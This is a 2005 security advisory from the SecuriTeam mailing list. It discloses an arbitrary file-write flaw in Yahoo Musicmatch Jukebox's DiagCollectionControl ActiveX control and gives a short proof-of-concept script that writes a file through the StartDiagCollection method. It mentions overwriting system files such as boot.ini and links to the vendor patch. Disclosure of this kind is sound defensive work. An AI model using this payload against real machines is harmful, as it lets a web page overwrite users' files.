The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Yahoo Musicmatch Remote File Inclusion
------------------------------------------------------------------------
SUMMARY
" <http://musicmatch.com/> Musicmatch Jukebox 10 is the most powerful way
to find and organize your music, giving you ultimate control of your music
experience. With a whole new range of library, playlist, and portable
device controls, Musicmatch Jukebox is more powerful and easier to use
than ever before." In September 2004 Musicmatch was purchased by Yahoo!
Inc.
Lack of parameters validation in Musicmatch ActiveX allows remote user to
write files on the vulnerable systems.
DETAILS
Vulnerable Systems:
* Musicmatch versions 10.00.2047 and prior
* Musicmatch versions 9.00.5059 and prior (according to vendor)
Immune Systems:
* Musicmatch versions 9 and 10 (fixed versions since 03/21/05)
DiagCollectionControl.dll is an ActiveX control which contains a Safe for
Scripting Interface with a method called StartDiagCollection with the
following definition:
Dispatch Function BOOL StartDiagCollection(BSTR bstrSavePath, BSTR
bstrUserEnteredInfo, BSTR bstrXMLControlFile, USERDEFINED eRequestType,
BOOL bUploadInfo, BOOL bEncryptZipFile, TR numJobs )
In this particular vulnerability, an attacker can pass in a malicious
value into bstrSavePath (eg: c:\\boot.ini). Once that method is called,
whichever file is specified will get overwritten.
Exploit:
The following is a non-malicious example:
< h1>If you have a vulnerable version a file "foo.txt" has been written to
the folder "c:\exploit".< br>
< br>It could have been used to overwrite critical system files.</h1>
< script>
var foo;
foo = new ActiveXObject("DiagCollectionControl.DiagCollectionA.1");
foo.StartDiagCollection("c:\\exploit\\foo.txt", "userinfo", "", 1, true,
false, "1");
< /script>
If you have the vulnerable ActiveX control, a file, foo.txt will be
created in the c:\exploit directory. Obviously, much worse can be done as
there is no restrictions to what files can be overwritten assuming the
user has access to them. It may be possible to control the data that goes
into the file as well, although I have not yet identified a method for
doing this.
Patch Availability:
The following links can be used to find more information on the patch and
the vulnerability: <http://www.musicmatch.com/download/free/security.htm>
Musicmatch Jukebox Security Updates,
<http://www.musicmatch.com/info/user_guide/faq/security_updates.htm>
Security FAQ.
ADDITIONAL INFORMATION
The information has been provided by <mailto:robfly@hyperdose.com> Robert
Fly.
The original article can be found at:
<http://www.hyperdose.com/advisories/H2005-02.txt>
http://www.hyperdose.com/advisories/H2005-02.txt
The original article can be found at:
<http://www.hyperdose.com/advisories/H2005-03.txt>
http://www.hyperdose.com/advisories/H2005-03.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
